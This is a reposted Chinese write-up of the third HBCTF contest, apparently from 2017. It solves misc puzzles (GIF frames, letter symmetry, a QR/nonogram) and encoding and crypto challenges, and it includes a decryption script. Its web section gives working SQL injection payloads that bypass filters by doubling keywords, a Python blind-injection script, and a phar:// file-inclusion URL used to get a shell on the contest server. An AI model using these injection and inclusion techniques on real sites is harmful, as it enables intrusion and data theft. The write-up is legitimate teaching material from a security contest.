HBCTF第三场WP-转载

HBCTF第三场WP

https://blog.ctftools.com/2017/05/post155

发表于2017年5月23日

Misc

乍得-签到

题作者:Pcat WriteUp作者:Pcat

原题下载:http://hbctf-1252906577.costj.myqcloud.com/misc/qd.zip

这图有2帧,第二帧里就有flag。而这签到题也是有一个坑点,就是我的后缀名是写.jpg而不是.gif,这样会导致一些图片播放器会以jpg播放(如win10默认的播放器),而ps会直接打不开。只要用winhex打开看到gif头,修改后缀名即可,或者你正好使用了可以识别gif头来播放的图片播放器也可以轻松签到过关。

ps,如果是用stegsolve,则”Anylyse”→”Frame Brower”就可以看到有2帧。

苏丹-Symmetric XY

题作者:Pcat WriteUp作者:Pcat

原题下载:http://hbctf-1252906577.costj.myqcloud.com/misc/SymmetricXY.txt

首先这题的介绍是杂项题,而不是密码题,所以不要绞尽心思的往密码学去想。题目为Symmetric

XY,Symmetric为对称的意思,后面有XY,如果回忆起中学数学的话,就不妨大胆的联想到X轴对称和Y轴对称

题目的文本内容为55*7的大写字母,只有大写字母,题目又说对称,那么就从字母对称下手吧。 X轴对称 BCDEKHIOX Y轴对称

AMTWUVYHIOX 我们先保留X轴对称的字母(这操作很简单,用正则替换即可)

在Sublime的替换里勾选上正则,把[^BCDEKHIOX\n]替换为空格,得到下面字符(使用Sublime也有一个好处就是等宽字体),如下图(图中用了notepad++):

这个就是HBCTF{X

再ctrl+z撤回,再进行保留Y轴对称的字母,把[^AMTWUVYHIOX\n]正则替换为空格,得到

这是IAOYAO}把前后连在一起就是HBCTF{XIAOYAO}

阿尔及利亚-QR_NO

题作者:Pcat WriteUp作者:Pcat

原题下载:http://hbctf-1252906577.costj.myqcloud.com/misc/qr_no.zip

在题目里我也是尽量给出tip,例如QR和NO,QR大家都知道是二维码,那么NO是什么呢?另外描述里说“给你一张图玩玩”。玩玩?玩什么?玩游戏么?是的,本题就是玩一款经典游戏。先把zip解压后是一张png,打开来看:图片中间是logo,不影响扫描,但在右边还有2个图片(都是hbctf群的群图标的一部分,只不过一张反色了)在干扰,导致直接扫描不出。表层的东西就这样,那么就看看这个png文件里有没有藏东西。

binwalk看得是懵逼,再上TweakPNG,

再用WinHex打开,

发现PNG的IEND结尾有一个NONO,后面还跟着IHDR,而且文件底部还有一个IEND,所以把NONO的4E4F4E4F修改为PNG头的89504E47,然后再分离出2个png文件(这一步你可以使用winhex或者foremost等等都可以)

第二图打开为

这里有一个9*9的空白区域,再去看看之前的qr图,里面缺失的2个图块都是9*9,那么猜想下这里是要求完成图块(建议用photoshop去填充色块)再去粘贴到之前的qr图上。这里其实就是一个经典游戏nonograms(自己百度去吧),为了给大家兴致,我就不贴完成的样子,把完成的9*9抠下来,缩放到72像素*72像素,然后粘贴到qr图那个反色的图标上面(这里我之所以采用反色也是为了提醒就是粘贴在这里,至于那个不反色的图标由于二维码的容差性而不影响其扫描)(ps,由于二维码的容差性很好,那个nonograms图填错一些也没事的。)

Crypto

尼日尔-simpleAES

题作者:Pcat WriteUp作者:Pcat

原题下载:http://hbctf-1252906577.costj.myqcloud.com/crypto/simpleAES.py

这题其实不难,就是涉及了md5,b64,b32,DES3,AES而已,就是练练py脚本而已。直接给解密脚本。

Python

# -*- coding:utf8 -*-__author__='pcat'__blog__='http://pcat.cnblogs.com'importreimportbase64fromhashlibimportmd5try:fromCrypto.CipherimportDES3,AESexceptImportError:print("Error: you must install the PyCrypto")print("http://www.cnblogs.com/pcat/p/6014575.html")exit()defgetkey():#因为一开始的key是经过encode的,所以爆破的字符集只需要十六进制即可cset='0123456789abcdef'#根据正则^5.*c.{2}54$key_model='5%s%sc%s%s54add_salt'foraincset:forbincset:forcincset:fordincset:key=key_model%(a,b,c,d)t=md5(key).hexdigest()ift=='a99c2b0ee8de34063367811c7cf2ca69':returnkeydefdecrypt():key=getkey()obj=DES3.new(key,DES3.MODE_ECB)cipher='mI4Os9etbYtcNJ6zF8psQA=='message=obj.decrypt(base64.b64decode(cipher))IV=''.join(chr(i)foriinrange(16))obj=AES.new(message,AES.MODE_CBC,IV)cipher2='4XCK5GX2TDXJQBHFHNUHLXKCEA4QZBX5ZWT7AAA45HHIGFOIBXZA===='flag=obj.decrypt(base64.b32decode(cipher2))printflagpassif__name__=='__main__':decrypt()

埃及-九重妖塔

题作者:逍遥自在 WriteUp作者:逍遥自在

原题下载:http://hbctf-1252906577.costj.myqcloud.com/crypto/9cyt.zip

1. 莫斯密码很熟悉,解得

%5cu0047%5cu0058%5cu0041%5cu0041%5cu0047%5cu004a%5cu0041%5cu0041%5cu0056%5cu0047

%5cu0041%5cu0042%5cu0047%5cu0056%5cu0057%5cu005a%5cu0042%5cu0057%5cu0044%5cu0041

%5cu0048%5cu005a%5cu005a%5cu0058%5cu0041%5cu0041%5cu0047%5cu004a%5cu0044%5cu005a

%5cu005a%5cu0058%5cu0041%5cu0041%5cu0048%5cu0041%5cu0048%5cu0047%5cu0047%5cu006c

%5cu0076%5cu0077%5cu0046%5cu0050%5cu0052%5cu0077%5cu0049%5cu0079%5cu006c%5cu0077

%5cu0046%5cu0046%5cu0052%5cu0047%5cu0046%5cu006c%5cu0076%5cu004e%5cu0048%5cu0047

%5cu0047%5cu006c%5cu0076%5cu0077%5cu0053%5cu0052%5cu0053%5cu0047%5cu0048%5cu006c

%5cu0076%5cu0076%5cu0052%5cu0054%5cu0062%5cu0074%5cu0048%5cu0045%5cu004f%5cu0048

%5cu0078%5cu005a%5cu0067%5cu0052%5cu0078%5cu0044%5cu0052%5cu004c%5cu0049%5cu0049

%5cu006a%5cu0074%5cu0030%5cu0048%5cu0063%5cu0049%5cu006b%5cu0078%5cu0052%5cu0045

%5cu004f%5cu004c%5cu0075%5cu0045%5cu0063%5cu0034%5cu0048%5cu0048%5cu006a%5cu0066

%5cu004f%5cu0078%5cu0031%5cu0075%5cu0049%5cu0054%5cu0038%5cu0034%5cu0075%5cu0050

%5cu006a%5cu0067%5cu0063%5cu0033%5cu0032%5cu005a%5cu004f%5cu0030%5cu006d%5cu0076

%5cu0079%5cu0050%5cu004f%5cu0052%5cu006d%5cu007a%5cu0049%5cu0054%5cu0038%5cu004c

%5cu004f%5cu0048%5cu006b%5cu007a%5cu0062%5cu0079%5cu0064%5cu0074

2. 看到%,就想想 URL 啊,解下吧

\u0047\u0058\u0041\u0041\u0047\u004a\u0041\u0041\u0056\u0047\u0041\u0042\u0047\u

0056\u0057\u005a\u0042\u0057\u0044\u0041\u0048\u005a\u005a\u0058\u0041\u0041\u00

47\u004a\u0044\u005a\u005a\u0058\u0041\u0041\u0048\u0041\u0048\u0047\u0047\u006c

\u0076\u0077\u0046\u0050\u0052\u0077\u0049\u0079\u006c\u0077\u0046\u0046\u0052\u

0047\u0046\u006c\u0076\u004e\u0048\u0047\u0047\u006c\u0076\u0077\u0053\u0052\u00

53\u0047\u0048\u006c\u0076\u0076\u0052\u0054\u0062\u0074\u0048\u0045\u004f\u0048

\u0078\u005a\u0067\u0052\u0078\u0044\u0052\u004c\u0049\u0049\u006a\u0074\u0030\u

0048\u0063\u0049\u006b\u0078\u0052\u0045\u004f\u004c\u0075\u0045\u0063\u0034\u00

48\u0048\u006a\u0066\u004f\u0078\u0031\u0075\u0049\u0054\u0038\u0034\u0075\u0050

\u006a\u0067\u0063\u0033\u0032\u005a\u004f\u0030\u006d\u0076\u0079\u0050\u004f\u

0052\u006d\u007a\u0049\u0054\u0038\u004c\u004f\u0048\u006b\u007a\u0062\u0079\u00

64\u0074

3. 看到\u 还想啥呢?unicode 吧,

GXAAGJAAVGABGVWZBWDAHZZXAAGJDZZXAAHAHGGlvwFPRwIylwFFRGFlvNHGGlvwSRSGHlvvRTbtHEOH

xZgRxDRLIIjt0HcIkxREOLuEc4HHjfOx1uIT84uPjgc32ZO0mvyPORmzIT8LOHkzbydt

4. 第四关是坑点的到来了,这关考的是栅栏密码,len 是 148,所以有四种,都列出来吧

5. 看起了是 base64 吧,可是又有点不一样啊,试试最常见的 rot13 呗

6.4 个一起 base64 解密呗,嗖嗖的,看其中有一个还是挺像的,提出来吧

7.看起了好像 uuencode 啊,试试去吧

8.中间有加号,这是什么鬼啊,base64 之前考过了不是,试试 xxencode 吧

9.这个 soeasy 了,base16。flag 到手,撤退

WEB

沙特阿拉伯-大美西安

题作者:Wonderkun WriteUp作者:Wonderkun

题目地址:http://web150.ctftools.com/index.php?file=login

注册一个账号进入之后,发现download页面的收藏功能存在整数型sql注入 download的过程是用文件id到数据库中查找文件路径,然后读取文件返回. 所以可以用union联合注入,修改文件名,下载别的文件. 这里有过滤,双写可以绕过.

image=888%20ununionion%20selselectect%200x696e6465782e706870&image_download=%E6%94%B6%E8%97%8F

就可以下载index.php,然后利用次方法下载所有的文件,进行代码审计. 发现index.php 存在文件包含漏洞,但是限定了后缀必须是 .php文件 所以思路是利用php的phar协议绕过,但是却没有文件上传路径,所以需要利用注入获取文件名. 由于过滤了(),所以需要利用union盲注,来找文件名. 具体怎么union盲注,参考这里http://wonderkun.cc/index.html/?p=547提供一个python的exp

Python

#!/usr/bin/python# coding:utf-8importrequestsdefgetFilename():data="image=2%20aandnd%20image_name%20lilikeke%200x74657374%20ununionion%20selselectect%200x{filename}%20oorrder%20by%201&image_download=%E6%94%B6%E8%97%8F"url="http://web150.ctftools.com/downfile.php"headers={"Content-Type":"application/x-www-form-urlencoded","Cookie":"PHPSESSID=k6to46unk90e733r47qdqh8ll7","User-Agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36"}randStr="0123456789abcdefghijklmnopqrstuvwxyz{"fileName="./Up10aDs/"for_inrange(33):print"[*]",fileNameforiinrange(len(randStr)):# print itmpFileName=fileName+randStr[i]proxies={"http":"127.0.0.1:8080"}res=requests.post(url,data=data.format(filename=tmpFileName.encode("hex")),headers=headers,proxies=proxies)# print res.textif"file may be deleted"notinres.text:fileName=fileName+randStr[i-1]breakif__name__=='__main__':getFilename()

计算出filename为:[*] ./Up10aDs/y9c8v9ow3s6ans5o8oy5u3qnsdnckeva

加上后缀名为自己上传文件的后缀名,就是文件名,所以文件名是

./Up10aDs/y9c8v9ow3s6ans5o8oy5u3qnsdnckeva.png 包含此文件就可以getshell了.

http://web150.ctftools.com/index.php?file=phar://Up10aDs/y9c8v9ow3s6ans5o8oy5u3qnsdnckeva.png/1

在文件F1AgIsH3r3G00d.php读取到flag

$flag = "flag{f1a4628ee1e9dccfdc511f0490c73397}";

HBCTF官方群(点击加入):595176019

在博客中遇到的问题可以联系admin@ctftools.com

本文由Dr3@m原创发布,转载请注明来自HBCTF BLOG,转载代码(点击全选,请按"Ctrl"+"C"复制):

此项目被张贴在HBCTF。书签的permalink

文章导航

←HBCTF第二场WP

HBCTF第四场WP→

©著作权归作者所有,转载或内容合作请联系作者
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 222,000评论 6 515
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 94,745评论 3 399
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 168,561评论 0 360
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 59,782评论 1 298
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 68,798评论 6 397
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 52,394评论 1 310
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 40,952评论 3 421
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 39,852评论 0 276
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 46,409评论 1 318
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 38,483评论 3 341
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 40,615评论 1 352
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 36,303评论 5 350
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 41,979评论 3 334
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 32,470评论 0 24
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 33,571评论 1 272
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 49,041评论 3 377
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 45,630评论 2 359

推荐阅读更多精彩内容